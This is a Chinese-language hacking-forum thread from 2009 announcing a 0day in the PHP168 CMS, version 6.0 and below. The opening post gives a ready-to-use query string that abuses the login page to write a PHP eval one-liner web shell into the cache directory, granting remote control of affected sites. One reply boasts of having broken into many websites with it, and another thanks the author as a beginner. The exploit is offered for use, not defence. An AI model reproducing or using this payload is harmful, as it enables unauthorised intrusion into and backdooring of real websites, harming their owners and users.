【3.A.S.T】网络安全爱好者 » 教程发布 » 红客联盟首发PHP168 6.0及以下版本0day

返回列表发帖

3.A.S.T士兵

Rank: 1

帖子: 13
积分: 31
威望: 40
金钱: 27
在线时间: 2 小时

1楼 跳转到 » 倒序看帖

字体大小: tT

发表于 2009-9-8 00:05 | 只看该作者

[原创] 红客联盟首发PHP168 6.0及以下版本0day

PHP168 6.0及以下版本漏洞

影响版本：PHP168 6.0以下版本

入侵者可以在用户登陆页面构造特殊语句，将PHP一句话写入cache目录，从而获得使用PHP168整站程序网站的WEBSHELL权限。
测试语句： XU3中国红客联盟-全球最大的红客组织

?makehtml=1&chdb[htmlname]=honker.php&chdb[path]=cache&content=?php%20@eval($_POST[honker]);?

1 评分人数

精品文章 威望 + 20 金钱 + 20

超超

[3.A.S.T]内部成员

Rank: 9 Rank: 9 Rank: 9

帖子: 561
积分: 1365
威望: 1488
金钱: 16351
在线时间: 150 小时

2楼

发表于 2009-9-8 01:17 | 只看该作者

成功入侵了很多网站

3.A.S.T少尉

Rank: 2

帖子: 66
积分: 97
威望: 107
金钱: 90
在线时间: 5 小时

3楼

发表于 2009-9-8 08:09 | 只看该作者

新手学习谢谢分享